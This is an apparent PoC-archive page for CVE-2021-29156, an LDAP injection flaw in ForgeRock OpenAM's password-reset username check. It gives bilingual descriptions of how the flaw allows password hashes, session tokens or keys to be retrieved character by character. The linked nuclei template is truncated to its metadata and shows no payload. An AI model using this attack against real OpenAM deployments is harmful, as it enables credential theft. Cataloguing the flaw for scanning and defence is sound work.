Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-29156 PoC — Forgerock ForgeRock OpenAM 注入漏洞

Source
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-29156.yaml
Associated Vulnerability
Title:Forgerock ForgeRock OpenAM 注入漏洞 (CVE-2021-29156)
Description:Forgerock ForgeRock OpenAM是美国ForgeRock(Forgerock)公司的一套开源的单点登录框架(SSO)。该框架通过提供核心的标识服务(CoreServer)以实现在一个网络架构中的透明单点登录(如集中式、分布式的单点登录)。 ForgeRock OpenAM before 13.5.1 存在注入漏洞,攻击者可利用该漏洞可以逐个字符地检索密码散列,或者检索会话令牌或私钥。
Description
OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
File Snapshot

 id: CVE-2021-29156

info:
  name: LDAP Injection In OpenAM
  author: melbadry9,xelkomy
  severity: h

...
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.